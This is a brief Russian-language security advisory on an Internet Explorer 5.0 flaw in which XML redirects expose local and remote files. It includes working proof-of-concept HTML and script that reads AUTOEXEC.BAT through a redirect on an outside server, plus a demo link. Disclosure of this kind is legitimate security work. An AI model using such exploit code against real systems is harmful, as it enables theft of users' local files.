Internet Explorer 5.0 под Windows 95 и WinNT 4.0 имеет проблемы с безопасностью из-за HTTP редиректов в объектах XML.
Это позволяет:
1) Читать любые (локальные или нелокальные) XML файлы и документы.
2) Читать части документов
3) Проверять существование локальных файлов
Когда кто-то включает XML-документ в HTML-документ, то IE 5.0 не обрабатывает редиректы должным образом и дает доступ к DOM внедренного XML-документа.
Exploit code:
<object id="xm" type="text/xml" data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
</object>
<SCRIPT>
function f()
{
s=xm.body.innerHTML;
a=window.open();
file://alert(s);
a.document.open();
a.document.write("Here is a part of AUTOEXEC.BAT (the error message is
normal):<BR>"+s);
a.document.close();
}
setTimeout("f()",5000);
</SCRIPT>
Демонстрация доступна здесь:
http://www.nat.bg/~joro/xmln.html
